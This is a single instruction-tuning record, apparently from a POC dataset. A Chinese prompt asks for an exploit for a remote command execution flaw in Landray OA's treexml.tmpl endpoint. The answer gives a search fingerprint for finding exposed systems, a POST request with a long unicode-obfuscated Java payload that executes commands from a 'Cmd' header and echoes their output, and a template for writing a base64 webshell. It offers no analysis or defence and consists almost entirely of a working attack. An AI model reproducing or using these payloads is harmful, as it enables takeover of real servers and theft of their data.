  886. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:蓝凌OA treexml.tmpl 远程命令执行漏洞\n漏洞描述:蓝凌OA treexml.tmpl存在远程命令执行漏洞,攻击者通过发送特定的请求包可以获取服务器权限\n影响版本:``` 蓝凌OA ```\n网络测绘:``` app=\"Landray-OA系统\" ```\n", "input": "", "output": "【漏洞类型】oa_vulnerability\n【POC利用方法】\n1. app=\"Landray-OA系统\"\n2. POST /data/sys-common/treexml.tmpl\nCmd: dir && ls\n  \ns_bean=ruleFormulaValidate&script=\\u0020\\u0020\\u0020\\u0020\\u0062\\u006f\\u006f\\u006c\\u0065\\u0061\\u006e\\u0020\\u0066\\u006c\\u0061\\u0067\\u0020\\u003d\\u0020\\u0066\\u0061\\u006c\\u0073\\u0065\\u003b\\u0054\\u0068\\u0072\\u0065\\u0061\\u0064\\u0047\\u0072\\u006f\\u0075\\u0070\\u0020\\u0067\\u0072\\u006f\\u0075\\u0070\\u0020\\u003d\\u0020\\u0054\\u0068\\u0072\\u0065\\u0061\\u0064\\u002e\\u0063\\u0075\\u0072\\u0072\\u0065\\u006e\\u0074\\u0054\\u0068\\u0072\\u0065\\u0061\\u0064\\u0028\\u0029\\u002e\\u0067\\u0065\\u0074\\u0054\\u0068\\u0072\\u0065\\u0061\\u0064\\u0047\\u0072\\u006f\\u0075\\u0070\\u0028\\u0029\\u003b\\u006a\\u0061\\u0076\\u0061\\u002e\\u006c\\u0061\\u006e\\u0067\\u002e\\u0072\\u0065\\u0066\\u006c\\u0065\\u0063\\u0074\\u002e\\u0046\\u0069\\u0065\\u006c\\u0064\\u0020\\u0066\\u0020\\u003d\\u0020\\u0067\\u0072\\u006f\\u0075\\u0070\\u002e\\u0067\\u0065\\u0074\\u0043\\u006c\\u0061\\u0073\\u0073\\u0028\\u0029\\u002e\\u0067\\u0065\\u0074\\u0044\\u0065\\u0063\\u006c\\u0061\\u0072\\u0065\\u0064\\u0046\\u0069\\u0065\\u006c\\u0064\\u0028\\u0022\\u0074\\u0068\\u0072\\u0065\\u0061\\u0064\\u0073\\u0022\\u0029\\u003b\\u0066\\u002e\\u0073\\u0065\\u0074\\u0041\\u0063\\u0063\\u0065\\u0073\\u0073\\u0069\\u0062\\u006c\\u0065\\u0028\\u0074\\u0072\\u0075\\u0065\\u0029\\u003b\\u0054\\u0068\\u0072\\u0065\\u0061\\u0064\\u005b\\u005d\\u0020\\u0074\\u0068\\u0072\\u0065\\u0061\\u0064\\u0073\\u0020\\u003d\\u0020\\u0028\\u0054\\u0068\\u0072\\u0065\\u0061\\u0064\\u005b\\u005d\\u0029\\u0020\\u0066\\u002e\\u0067\\u0065\\u0074\\u0028\\u0067\\u0072\\u006f\\u0075\\u0070\\u0029\\u003b\\u0066\\u006f\\u0072\\u0020\\u0028\\u0069\\u006e\\u0074\\u0020\\u0069\\u0020\\u003d\\u0020\\u0030\\u003b\\u0020\\u0069\\u0020\\u003c\\u0020\\u0074\\u0068\\u0072\\u0065\\u0061\\u0064\\u0073\\u002e\\u006c\\u0065\\u006e\\u0067\\u0074\\u0068\\u003b\\u0020\\u0069\\u002b\\u002b\\u0029\\u0020\\u007b\\u0020\\u0074\\u0072\\u0079\\u0020\\u007b\\u0020\\u0054\\u0068\\u0072\\u0065\\u0061\\u0064\\u0020\\u0074\\u0020\\u003d\\u0020\\u0074\\u0068\\u0072\\u0065\\u0061\\u0064\\u0073\\u005b\\u0069\\u005d\\u003b\\u0069\\u0066\\u0020\\u0028\\u0074\\u0020\\u003d\\u003d\\u0020\\u006e\\u0075\\u006c\\u006c\\u0029\\u0020\\u007b\\u0020\\u0063\\u006f\\u006e\\u0074\\u0069\\u006e\\u0075\\u0065\\u003b\\u0020\\u007d\\u0053\\u0074\\u0072\\u0069\\u006e\\u0067\\u0020\\u0073\\u0074\\u0072\\u0020\\u003d\\u0020\\u0074\\u002e\\u0067\\u0065\\u0074\\u004e\\u0061\\u006d\\u0065\\u0028\\u0029\\u003b\\u0069\\u0066\\u0020\\u0028\\u0073\\u0074\\u0072\\u002e\\u0063\\u006f\\u006e\\u0074\\u0061\\u0069\\u006e\\u0073\\u0028\\u0022\\u0065\\u0078\\u0065\\u0063\\u0022\\u0029\\u0020\\u007c\\u007c\\u0020\\u0021\\u0073\\u0074\\u0072\\u002e\\u0063\\u006f\\u006e\\u0074\\u0061\\u0069\\u006e\\u0073\\u0028\\u0022\\u0068\\u0074\\u0074\\u0070\\u0022\\u0029\\u0029\\u0020\\u007b\\u0020\\u0063\\u006f\\u006e\\u0074\\u0069\\u006e\\u0075\\u0065\\u003b\\u0020\\u007d\\u0066\\u0020\\u003d\\u0020\\u0074\\u002e\\u0067\\u0065\\u0074\\u0043\\u006c\\u0061\\u0073\\u0073\\u0028\\u0029\\u002e\\u0067\\u0065\\u0074\\u0044\\u0065\\u0063\\u006c\\u0061\\u0072\\u0065\\u0064\\u0046\\u0069\\u0065\\u006c\\u0064\\u0028\\u0022\\u0074\\u0061\\u0072\\u0067\\u0065\\u0074\\u0022\\u0029\\u003b\\u0066\\u002e\\u0073\\u0065\\u0074\\u0041\\u0063\\u0063\\u0065\\u0073\\u0073\\u0069\\u0062\\u006c\\u0065\\u0028\\u0074\\u0072\\u0075\\u0065\\u0029\\u003b\\u004f\\u0062\\u006a\\u0065\\u0063\\u0074\\u0020\\u006f\\u0062\\u006a\\u0020\\u003d\\u0020\\u0066\\u002e\\u0067\\u0065\\u0074\\u0028\\u0074\\u0029\\u003b\\u0069\\u0066\\u0020\\u0028\\u0021\\u0028\\u006f\\u0062\\u006a\\u0020\\u0069\\u006e\\u0073\\u0074\\u0061\\u006e\\u0063\\u0065\\u006f\\u0066\\u0020\\u0052\\u0075\\u006e\\u006e\\u0061\\u0062\\u006c\\u0065\\u0029\\u0029\\u0020\\u007b\\u0020\\u0063\\u006f\\u006e\\u0074\\u0069\\u006e\\u0075\\u0065\\u003b\\u0020\\u007d\\u0066\\u0020\\u003d\\u0020\\u006f\\u0062\\u006a\\u002e\\u0067\\u0065\\u0074\\u0043\\u006c\\u0061\\u0073\\u0073\\u0028\\u0029\\u002e\\u0067\\u0065\\u0074\\u0044\\u0065\\u0063\\u006c\\u0061\\u0072\\u0065\\u0064\\u0046\\u0069\\u0065\\u006c\\u0064\\u0028\\u0022\\u0074\\u0068\\u0069\\u0073\\u0024\\u0030\\u0022\\u0029\\u003b\\u0066\\u002e\\u0073\\u0065\\u0074\\u0041\\u0063\\u0063\\u0065\\u0073\\u0073\\u0069\\u0062\\u006c\\u0065\\u0028\\u0074\\u0072\\u0075\\u0065\\u0029\\u003b\\u006f\\u0062\\u006a\\u0020\\u003d\\u0020\\u0066\\u002e\\u0067\\u0065\\u0074\\u0028\\u006f\\u0062\\u006a\\u0029\\u003b\\u0074\\u0072\\u0079\\u0020\\u007b\\u0020\\u0066\\u0020\\u003d\\u0020\\u006f\\u0062\\u006a\\u002e\\u0067\\u0065\\u0074\\u0043\\u006c\\u0061\\u0073\\u0073\\u0028\\u0029\\u002e\\u0067\\u0065\\u0074\\u0044\\u0065\\u0063\\u006c\\u0061\\u0072\\u0065\\u0064\\u0046\\u0069\\u0065\\u006c\\u0064\\u0028\\u0022\\u0068\\u0061\\u006e\\u0064\\u006c\\u0065\\u0072\\u0022\\u0029\\u003b\\u0020\\u007d\\u0020\\u0063\\u0061\\u0074\\u0063\\u0068\\u0020\\u0028\\u004e\\u006f\\u0053\\u0075\\u0063\\u0068\\u0046\\u0069\\u0065\\u006c\\u0064\\u0045\\u0078\\u0063\\u0065\\u0070\\u0074\\u0069\\u006f\\u006e\\u0020\\u0065\\u0029\\u0020\\u007b\\u0020\\u0066\\u0020\\u003d\\u0020\\u006f\\u0062\\u006a\\u002e\\u0067\\u0065\\u0074\\u0043\\u006c\\u0061\\u0073\\u0073\\u0028\\u0029\\u002e\\u0067\\u0065\\u0074\\u0053\\u0075\\u0070\\u0065\\u0072\\u0063\\u006c\\u0061\\u0073\\u0073\\u0028\\u0029\\u002e\\u0067\\u0065\\u0074\\u0053\\u0075\\u0070\\u0065\\u0072\\u0063\\u006c\\u0061\\u0073\\u0073\\u0028\\u0029\\u002e\\u0067\\u0065\\u0074\\u0044\\u0065\\u0063\\u006c\\u0061\\u0072\\u0065\\u0064\\u0046\\u0069\\u0065\\u006c\\u0064\\u0028\\u0022\\u0068\\u0061\\u006e\\u0064\\u006c\\u0065\\u0072\\u0022\\u0029\\u003b\\u0020\\u007d\\u0066\\u002e\\u0073\\u0065\\u0074\\u0041\\u0063\\u0063\\u0065\\u0073\\u0073\\u0069\\u0062\\u006c\\u0065\\u0028\\u0074\\u0072\\u0075\\u0065\\u0029\\u003b\\u006f\\u0062\\u006a\\u0020\\u003d\\u0020\\u0066\\u002e\\u0067\\u0065\\u0074\\u0028\\u006f\\u0062\\u006a\\u0029\\u003b\\u0074\\u0072\\u0079\\u0020\\u007b\\u0020\\u0066\\u0020\\u003d\\u0020\\u006f\\u0062\\u006a\\u002e\\u0067\\u0065\\u0074\\u0043\\u006c\\u0061\\u0073\\u0073\\u0028\\u0029\\u002e\\u0067\\u0065\\u0074\\u0053\\u0075\\u0070\\u0065\\u0072\\u0063\\u006c\\u0061\\u0073\\u0073\\u0028\\u0029\\u002e\\u0067\\u0065\\u0074\\u0044\\u0065\\u0063\\u006c\\u0061\\u0072\\u0065\\u0064\\u0046\\u0069\\u0065\\u006c\\u0064\\u0028\\u0022\\u0067\\u006c\\u006f\\u0062\\u0061\\u006c\\u0022\\u0029\\u003b\\u0020\\u007d\\u0020\\u0063\\u0061\\u0074\\u0063\\u0068\\u0020\\u0028\\u004e\\u006f\\u0053\\u0075\\u0063\\u0068\\u0046\\u0069\\u0065\\u006c\\u0064\\u0045\\u0078\\u0063\\u0065\\u0070\\u0074\\u0069\\u006f\\u006e\\u0020\\u0065\\u0029\\u0020\\u007b\\u0020\\u0066\\u0020\\u003d\\u0020\\u006f\\u0062\\u006a\\u002e\\u0067\\u0065\\u0074\\u0043\\u006c\\u0061\\u0073\\u0073\\u0028\\u0029\\u002e\\u0067\\u0065\\u0074\\u0044\\u0065\\u0063\\u006c\\u0061\\u0072\\u0065\\u0064\\u0046\\u0069\\u0065\\u006c\\u0064\\u0028\\u0022\\u0067\\u006c\\u006f\\u0062\\u0061\\u006c\\u0022\\u0029\\u003b\\u0020\\u007d\\u0066\\u002e\\u0073\\u0065\\u0074\\u0041\\u0063\\u0063\\u0065\\u0073\\u0073\\u0069\\u0062\\u006c\\u0065\\u0028\\u0074\\u0072\\u0075\\u0065\\u0029\\u003b\\u006f\\u0062\\u006a\\u0020\\u003d\\u0020\\u0066\\u002e\\u0067\\u0065\\u0074\\u0028\\u006f\\u0062\\u006a\\u0029\\u003b\\u0066\\u0020\\u003d\\u0020\\u006f\\u0062\\u006a\\u002e\\u0067\\u0065\\u0074\\u0043\\u006c\\u0061\\u0073\\u0073\\u0028\\u0029\\u002e\\u0067\\u0065\\u0074\\u0044\\u0065\\u0063\\u006c\\u0061\\u0072\\u0065\\u0064\\u0046\\u0069\\u0065\\u006c\\u0064\\u0028\\u0022\\u0070\\u0072\\u006f\\u0063\\u0065\\u0073\\u0073\\u006f\\u0072\\u0073\\u0022\\u0029\\u003b\\u0066\\u002e\\u0073\\u0065\\u0074\\u0041\\u0063\\u0063\\u0065\\u0073\\u0073\\u0069\\u0062\\u006c\\u0065\\u0028\\u0074\\u0072\\u0075\\u0065\\u0029\\u003b\\u006a\\u0061\\u0076\\u0061\\u002e\\u0075\\u0074\\u0069\\u006c\\u002e\\u004c\\u0069\\u0073\\u0074\\u0020\\u0070\\u0072\\u006f\\u0063\\u0065\\u0073\\u0073\\u006f\\u0072\\u0073\\u0020\\u003d\\u0020\\u0028\\u006a\\u0061\\u0076\\u0061\\u002e\\u0075\\u0074\\u0069\\u006c\\u002e\\u004c\\u0069\\u0073\\u0074\\u0029\\u0020\\u0028\\u0066\\u002e\\u0067\\u0065\\u0074\\u0028\\u006f\\u0062\\u006a\\u0029\\u0029\\u003b\\u0066\\u006f\\u0072\\u0020\\u0028\\u0069\\u006e\\u0074\\u0020\\u006a\\u0020\\u003d\\u0020\\u0030\\u003b\\u0020\\u006a\\u0020\\u003c\\u0020\\u0070\\u0072\\u006f\\u0063\\u0065\\u0073\\u0073\\u006f\\u0072\\u0073\\u002e\\u0073\\u0069\\u007a\\u0065\\u0028\\u0029\\u003b\\u0020\\u002b\\u002b\\u006a\\u0029\\u0020\\u007b\\u0020\\u004f\\u0062\\u006a\\u0065\\u0063\\u0074\\u0020\\u0070\\u0072\\u006f\\u0063\\u0065\\u0073\\u0073\\u006f\\u0072\\u0020\\u003d\\u0020\\u0070\\u0072\\u006f\\u0063\\u0065\\u0073\\u0073\\u006f\\u0072\\u0073\\u002e\\u0067\\u0065\\u0074\\u0028\\u006a\\u0029\\u003b\\u0066\\u0020\\u003d\\u0020\\u0070\\u0072\\u006f\\u0063\\u0065\\u0073\\u0073\\u006f\\u0072\\u002e\\u0067\\u0065\\u0074\\u0043\\u006c\\u0061\\u0073\\u0073\\u0028\\u0029\\u002e\\u0067\\u0065\\u0074\\u0044\\u0065\\u0063\\u006c\\u0061\\u0072\\u0065\\u0064\\u0046\\u0069\\u0065\\u006c\\u0064\\u0028\\u0022\\u0072\\u0065\\u0071\\u0022\\u0029\\u003b\\u0066\\u002e\\u0073\\u0065\\u0074\\u0041\\u0063\\u0063\\u0065\\u0073\\u0073\\u0069\\u0062\\u006c\\u0065\\u0028\\u0074\\u0072\\u0075\\u0065\\u0029\\u003b\\u004f\\u0062\\u006a\\u0065\\u0063\\u0074\\u0020\\u0072\\u0065\\u0071\\u0020\\u003d\\u0020\\u0066\\u002e\\u0067\\u0065\\u0074\\u0028\\u0070\\u0072\\u006f\\u0063\\u0065\\u0073\\u0073\\u006f\\u0072\\u0029\\u003b\\u004f\\u0062\\u006a\\u0065\\u0063\\u0074\\u0020\\u0072\\u0065\\u0073\\u0070\\u0020\\u003d\\u0020\\u0072\\u0065\\u0071\\u002e\\u0067\\u0065\\u0074\\u0043\\u006c\\u0061\\u0073\\u0073\\u0028\\u0029\\u002e\\u0067\\u0065\\u0074\\u004d\\u0065\\u0074\\u0068\\u006f\\u0064\\u0028\\u0022\\u0067\\u0065\\u0074\\u0052\\u0065\\u0073\\u0070\\u006f\\u006e\\u0073\\u0065\\u0022\\u002c\\u0020\\u006e\\u0065\\u0077\\u0020\\u0043\\u006c\\u0061\\u0073\\u0073\\u005b\\u0030\\u005d\\u0029\\u002e\\u0069\\u006e\\u0076\\u006f\\u006b\\u0065\\u0028\\u0072\\u0065\\u0071\\u002c\\u0020\\u006e\\u0065\\u0077\\u0020\\u004f\\u0062\\u006a\\u0065\\u0063\\u0074\\u005b\\u0030\\u005d\\u0029\\u003b\\u0073\\u0074\\u0072\\u0020\\u003d\\u0020\\u0028\\u0053\\u0074\\u0072\\u0069\\u006e\\u0067\\u0029\\u0020\\u0072\\u0065\\u0071\\u002e\\u0067\\u0065\\u0074\\u0043\\u006c\\u0061\\u0073\\u0073\\u0028\\u0029\\u002e\\u0067\\u0065\\u0074\\u004d\\u0065\\u0074\\u0068\\u006f\\u0064\\u0028\\u0022\\u0067\\u0065\\u0074\\u0048\\u0065\\u0061\\u0064\\u0065\\u0072\\u0022\\u002c\\u0020\\u006e\\u0065\\u0077\\u0020\\u0043\\u006c\\u0061\\u0073\\u0073\\u005b\\u005d\\u007b\\u0053\\u0074\\u0072\\u0069\\u006e\\u0067\\u002e\\u0063\\u006c\\u0061\\u0073\\u0073\\u007d\\u0029\\u002e\\u0069\\u006e\\u0076\\u006f\\u006b\\u0065\\u0028\\u0072\\u0065\\u0071\\u002c\\u0020\\u006e\\u0065\\u0077\\u0020\\u004f\\u0062\\u006a\\u0065\\u0063\\u0074\\u005b\\u005d\\u007b\\u0022\\u0043\\u006d\\u0064\\u0022\\u007d\\u0029\\u003b\\u0069\\u0066\\u0020\\u0028\\u0073\\u0074\\u0072\\u0020\\u0021\\u003d\\u0020\\u006e\\u0075\\u006c\\u006c\\u0020\\u0026\\u0026\\u0020\\u0021\\u0073\\u0074\\u0072\\u002e\\u0069\\u0073\\u0045\\u006d\\u0070\\u0074\\u0079\\u0028\\u0029\\u0029\\u0020\\u007b\\u0020\\u0072\\u0065\\u0073\\u0070\\u002e\\u0067\\u0065\\u0074\\u0043\\u006c\\u0061\\u0073\\u0073\\u0028\\u0029\\u002e\\u0067\\u0065\\u0074\\u004d\\u0065\\u0074\\u0068\\u006f\\u0064\\u0028\\u0022\\u0073\\u0065\\u0074\\u0053\\u0074\\u0061\\u0074\\u0075\\u0073\\u0022\\u002c\\u0020\\u006e\\u0065\\u0077\\u0020\\u0043\\u006c\\u0061\\u0073\\u0073\\u005b\\u005d\\u007b\\u0069\\u006e\\u0074\\u002e\\u0063\\u006c\\u0061\\u0073\\u0073\\u007d\\u0029\\u002e\\u0069\\u006e\\u0076\\u006f\\u006b\\u0065\\u0028\\u0072\\u0065\\u0073\\u0070\\u002c\\u0020\\u006e\\u0065\\u0077\\u0020\\u004f\\u0062\\u006a\\u0065\\u0063\\u0074\\u005b\\u005d\\u007b\\u006e\\u0065\\u0077\\u0020\\u0049\\u006e\\u0074\\u0065\\u0067\\u0065\\u0072\\u0028\\u0032\\u0030\\u0030\\u0029\\u007d\\u0029\\u003b\\u0053\\u0074\\u0072\\u0069\\u006e\\u0067\\u005b\\u005d\\u0020\\u0063\\u006d\\u0064\\u0073\\u0020\\u003d\\u0020\\u0053\\u0079\\u0073\\u0074\\u0065\\u006d\\u002e\\u0067\\u0065\\u0074\\u0050\\u0072\\u006f\\u0070\\u0065\\u0072\\u0074\\u0079\\u0028\\u0022\\u006f\\u0073\\u002e\\u006e\\u0061\\u006d\\u0065\\u0022\\u0029\\u002e\\u0074\\u006f\\u004c\\u006f\\u0077\\u0065\\u0072\\u0043\\u0061\\u0073\\u0065\\u0028\\u0029\\u002e\\u0063\\u006f\\u006e\\u0074\\u0061\\u0069\\u006e\\u0073\\u0028\\u0022\\u0077\\u0069\\u006e\\u0064\\u006f\\u0077\\u0022\\u0029\\u0020\\u003f\\u0020\\u006e\\u0065\\u0077\\u0020\\u0053\\u0074\\u0072\\u0069\\u006e\\u0067\\u005b\\u005d\\u007b\\u0022\\u0063\\u006d\\u0064\\u002e\\u0065\\u0078\\u0065\\u0022\\u002c\\u0020\\u0022\\u002f\\u0063\\u0022\\u002c\\u0020\\u0073\\u0074\\u0072\\u007d\\u0020\\u003a\\u0020\\u006e\\u0065\\u0077\\u0020\\u0053\\u0074\\u0072\\u0069\\u006e\\u0067\\u005b\\u005d\\u007b\\u0022\\u002f\\u0062\\u0069\\u006e\\u002f\\u0073\\u0068\\u0022\\u002c\\u0020\\u0022\\u002d\\u0063\\u0022\\u002c\\u0020\\u0073\\u0074\\u0072\\u007d\\u003b\\u0053\\u0074\\u0072\\u0069\\u006e\\u0067\\u0020\\u0063\\u0068\\u0061\\u0072\\u0073\\u0065\\u0074\\u004e\\u0061\\u006d\\u0065\\u0020\\u003d\\u0020\\u0053\\u0079\\u0073\\u0074\\u0065\\u006d\\u002e\\u0067\\u0065\\u0074\\u0050\\u0072\\u006f\\u0070\\u0065\\u0072\\u0074\\u0079\\u0028\\u0022\\u006f\\u0073\\u002e\\u006e\\u0061\\u006d\\u0065\\u0022\\u0029\\u002e\\u0074\\u006f\\u004c\\u006f\\u0077\\u0065\\u0072\\u0043\\u0061\\u0073\\u0065\\u0028\\u0029\\u002e\\u0063\\u006f\\u006e\\u0074\\u0061\\u0069\\u006e\\u0073\\u0028\\u0022\\u0077\\u0069\\u006e\\u0064\\u006f\\u0077\\u0022\\u0029\\u0020\\u003f\\u0020\\u0022\\u0047\\u0042\\u004b\\u0022\\u003a\\u0022\\u0055\\u0054\\u0046\\u002d\\u0038\\u0022\\u003b\\u0062\\u0079\\u0074\\u0065\\u005b\\u005d\\u0020\\u0074\\u0065\\u0078\\u0074\\u0032\\u0020\\u003d\\u0028\\u006e\\u0065\\u0077\\u0020\\u006a\\u0061\\u0076\\u0061\\u002e\\u0075\\u0074\\u0069\\u006c\\u002e\\u0053\\u0063\\u0061\\u006e\\u006e\\u0065\\u0072\\u0028\\u0028\\u006e\\u0065\\u0077\\u0020\\u0050\\u0072\\u006f\\u0063\\u0065\\u0073\\u0073\\u0042\\u0075\\u0069\\u006c\\u0064\\u0065\\u0072\\u0028\\u0063\\u006d\\u0064\\u0073\\u0029\\u0029\\u002e\\u0073\\u0074\\u0061\\u0072\\u0074\\u0028\\u0029\\u002e\\u0067\\u0065\\u0074\\u0049\\u006e\\u0070\\u0075\\u0074\\u0053\\u0074\\u0072\\u0065\\u0061\\u006d\\u0028\\u0029\\u002c\\u0063\\u0068\\u0061\\u0072\\u0073\\u0065\\u0074\\u004e\\u0061\\u006d\\u0065\\u0029\\u0029\\u002e\\u0075\\u0073\\u0065\\u0044\\u0065\\u006c\\u0069\\u006d\\u0069\\u0074\\u0065\\u0072\\u0028\\u0022\\u005c\\u005c\\u0041\\u0022\\u0029\\u002e\\u006e\\u0065\\u0078\\u0074\\u0028\\u0029\\u002e\\u0067\\u0065\\u0074\\u0042\\u0079\\u0074\\u0065\\u0073\\u0028\\u0063\\u0068\\u0061\\u0072\\u0073\\u0065\\u0074\\u004e\\u0061\\u006d\\u0065\\u0029\\u003b\\u0062\\u0079\\u0074\\u0065\\u005b\\u005d\\u0020\\u0072\\u0065\\u0073\\u0075\\u006c\\u0074\\u003d\\u0028\\u0022\\u0045\\u0078\\u0065\\u0063\\u0075\\u0074\\u0065\\u003a\\u0020\\u0020\\u0020\\u0020\\u0022\\u002b\\u006e\\u0065\\u0077\\u0020\\u0053\\u0074\\u0072\\u0069\\u006e\\u0067\\u0028\\u0074\\u0065\\u0078\\u0074\\u0032\\u002c\\u0022\\u0075\\u0074\\u0066\\u002d\\u0038\\u0022\\u0029\\u0029\\u002e\\u0067\\u0065\\u0074\\u0042\\u0079\\u0074\\u0065\\u0073\\u0028\\u0063\\u0068\\u0061\\u0072\\u0073\\u0065\\u0074\\u004e\\u0061\\u006d\\u0065\\u0029\\u003b\\u0074\\u0072\\u0079\\u0020\\u007b\\u0020\\u0043\\u006c\\u0061\\u0073\\u0073\\u0020\\u0063\\u006c\\u0073\\u0020\\u003d\\u0020\\u0043\\u006c\\u0061\\u0073\\u0073\\u002e\\u0066\\u006f\\u0072\\u004e\\u0061\\u006d\\u0065\\u0028\\u0022\\u006f\\u0072\\u0067\\u002e\\u0061\\u0070\\u0061\\u0063\\u0068\\u0065\\u002e\\u0074\\u006f\\u006d\\u0063\\u0061\\u0074\\u002e\\u0075\\u0074\\u0069\\u006c\\u002e\\u0062\\u0075\\u0066\\u002e\\u0042\\u0079\\u0074\\u0065\\u0043\\u0068\\u0075\\u006e\\u006b\\u0022\\u0029\\u003b\\u006f\\u0062\\u006a\\u0020\\u003d\\u0020\\u0063\\u006c\\u0073\\u002e\\u006e\\u0065\\u0077\\u0049\\u006e\\u0073\\u0074\\u0061\\u006e\\u0063\\u0065\\u0028\\u0029\\u003b\\u0063\\u006c\\u0073\\u002e\\u0067\\u0065\\u0074\\u0044\\u0065\\u0063\\u006c\\u0061\\u0072\\u0065\\u0064\\u004d\\u0065\\u0074\\u0068\\u006f\\u0064\\u0028\\u0022\\u0073\\u0065\\u0074\\u0042\\u0079\\u0074\\u0065\\u0073\\u0022\\u002c\\u0020\\u006e\\u0065\\u0077\\u0020\\u0043\\u006c\\u0061\\u0073\\u0073\\u005b\\u005d\\u007b\\u0062\\u0079\\u0074\\u0065\\u005b\\u005d\\u002e\\u0063\\u006c\\u0061\\u0073\\u0073\\u002c\\u0020\\u0069\\u006e\\u0074\\u002e\\u0063\\u006c\\u0061\\u0073\\u0073\\u002c\\u0020\\u0069\\u006e\\u0074\\u002e\\u0063\\u006c\\u0061\\u0073\\u0073\\u007d\\u0029\\u002e\\u0069\\u006e\\u0076\\u006f\\u006b\\u0065\\u0028\\u006f\\u0062\\u006a\\u002c\\u0020\\u006e\\u0065\\u0077\\u0020\\u004f\\u0062\\u006a\\u0065\\u0063\\u0074\\u005b\\u005d\\u007b\\u0072\\u0065\\u0073\\u0075\\u006c\\u0074\\u002c\\u0020\\u006e\\u0065\\u0077\\u0020\\u0049\\u006e\\u0074\\u0065\\u0067\\u0065\\u0072\\u0028\\u0030\\u0029\\u002c\\u0020\\u006e\\u0065\\u0077\\u0020\\u0049\\u006e\\u0074\\u0065\\u0067\\u0065\\u0072\\u0028\\u0072\\u0065\\u0073\\u0075\\u006c\\u0074\\u002e\\u006c\\u0065\\u006e\\u0067\\u0074\\u0068\\u0029\\u007d\\u0029\\u003b\\u0072\\u0065\\u0073\\u0070\\u002e\\u0067\\u0065\\u0074\\u0043\\u006c\\u0061\\u0073\\u0073\\u0028\\u0029\\u002e\\u0067\\u0065\\u0074\\u004d\\u0065\\u0074\\u0068\\u006f\\u0064\\u0028\\u0022\\u0064\\u006f\\u0057\\u0072\\u0069\\u0074\\u0065\\u0022\\u002c\\u0020\\u006e\\u0065\\u0077\\u0020\\u0043\\u006c\\u0061\\u0073\\u0073\\u005b\\u005d\\u007b\\u0063\\u006c\\u0073\\u007d\\u0029\\u002e\\u0069\\u006e\\u0076\\u006f\\u006b\\u0065\\u0028\\u0072\\u0065\\u0073\\u0070\\u002c\\u0020\\u006e\\u0065\\u0077\\u0020\\u004f\\u0062\\u006a\\u0065\\u0063\\u0074\\u005b\\u005d\\u007b\\u006f\\u0062\\u006a\\u007d\\u0029\\u003b\\u0020\\u007d\\u0020\\u0063\\u0061\\u0074\\u0063\\u0068\\u0020\\u0028\\u004e\\u006f\\u0053\\u0075\\u0063\\u0068\\u004d\\u0065\\u0074\\u0068\\u006f\\u0064\\u0045\\u0078\\u0063\\u0065\\u0070\\u0074\\u0069\\u006f\\u006e\\u0020\\u0076\\u0061\\u0072\\u0035\\u0029\\u0020\\u007b\\u0020\\u0043\\u006c\\u0061\\u0073\\u0073\\u0020\\u0063\\u006c\\u0073\\u0020\\u003d\\u0020\\u0043\\u006c\\u0061\\u0073\\u0073\\u002e\\u0066\\u006f\\u0072\\u004e\\u0061\\u006d\\u0065\\u0028\\u0022\\u006a\\u0061\\u0076\\u0061\\u002e\\u006e\\u0069\\u006f\\u002e\\u0042\\u0079\\u0074\\u0065\\u0042\\u0075\\u0066\\u0066\\u0065\\u0072\\u0022\\u0029\\u003b\\u006f\\u0062\\u006a\\u0020\\u003d\\u0020\\u0063\\u006c\\u0073\\u002e\\u0067\\u0065\\u0074\\u0044\\u0065\\u0063\\u006c\\u0061\\u0072\\u0065\\u0064\\u004d\\u0065\\u0074\\u0068\\u006f\\u0064\\u0028\\u0022\\u0077\\u0072\\u0061\\u0070\\u0022\\u002c\\u0020\\u006e\\u0065\\u0077\\u0020\\u0043\\u006c\\u0061\\u0073\\u0073\\u005b\\u005d\\u007b\\u0062\\u0079\\u0074\\u0065\\u005b\\u005d\\u002e\\u0063\\u006c\\u0061\\u0073\\u0073\\u007d\\u0029\\u002e\\u0069\\u006e\\u0076\\u006f\\u006b\\u0065\\u0028\\u0063\\u006c\\u0073\\u002c\\u0020\\u006e\\u0065\\u0077\\u0020\\u004f\\u0062\\u006a\\u0065\\u0063\\u0074\\u005b\\u005d\\u007b\\u0072\\u0065\\u0073\\u0075\\u006c\\u0074\\u007d\\u0029\\u003b\\u0072\\u0065\\u0073\\u0070\\u002e\\u0067\\u0065\\u0074\\u0043\\u006c\\u0061\\u0073\\u0073\\u0028\\u0029\\u002e\\u0067\\u0065\\u0074\\u004d\\u0065\\u0074\\u0068\\u006f\\u0064\\u0028\\u0022\\u0064\\u006f\\u0057\\u0072\\u0069\\u0074\\u0065\\u0022\\u002c\\u0020\\u006e\\u0065\\u0077\\u0020\\u0043\\u006c\\u0061\\u0073\\u0073\\u005b\\u005d\\u007b\\u0063\\u006c\\u0073\\u007d\\u0029\\u002e\\u0069\\u006e\\u0076\\u006f\\u006b\\u0065\\u0028\\u0072\\u0065\\u0073\\u0070\\u002c\\u0020\\u006e\\u0065\\u0077\\u0020\\u004f\\u0062\\u006a\\u0065\\u0063\\u0074\\u005b\\u005d\\u007b\\u006f\\u0062\\u006a\\u007d\\u0029\\u003b\\u0020\\u007d\\u0066\\u006c\\u0061\\u0067\\u0020\\u003d\\u0020\\u0074\\u0072\\u0075\\u0065\\u003b\\u0020\\u007d\\u0069\\u0066\\u0020\\u0028\\u0066\\u006c\\u0061\\u0067\\u0029\\u0020\\u007b\\u0020\\u0062\\u0072\\u0065\\u0061\\u006b\\u003b\\u0020\\u007d\\u0020\\u007d\\u0069\\u0066\\u0020\\u0028\\u0066\\u006c\\u0061\\u0067\\u0029\\u0020\\u007b\\u0020\\u0062\\u0072\\u0065\\u0061\\u006b\\u003b\\u0020\\u007d\\u0020\\u007d\\u0020\\u0063\\u0061\\u0074\\u0063\\u0068\\u0020\\u0028\\u0045\\u0078\\u0063\\u0065\\u0070\\u0074\\u0069\\u006f\\u006e\\u0020\\u0065\\u0029\\u0020\\u007b\\u0020\\u0063\\u006f\\u006e\\u0074\\u0069\\u006e\\u0075\\u0065\\u003b\\u0020\\u007d\\u0020\\u007d\n3. POST /data/sys-common/treexml.tmpl HTTP/1.1\nHost: your-ip\n\ns_bean=ruleFormulaValidate&script=<shell>(\"base64webshell\"));fout.close();\n", "category": "poc_oa_vulnerability", "source": "awesome_poc_dataset", "file_path": "OA产品漏洞/蓝凌OA treexml.tmpl 远程命令执行漏洞.md"}
    887. 

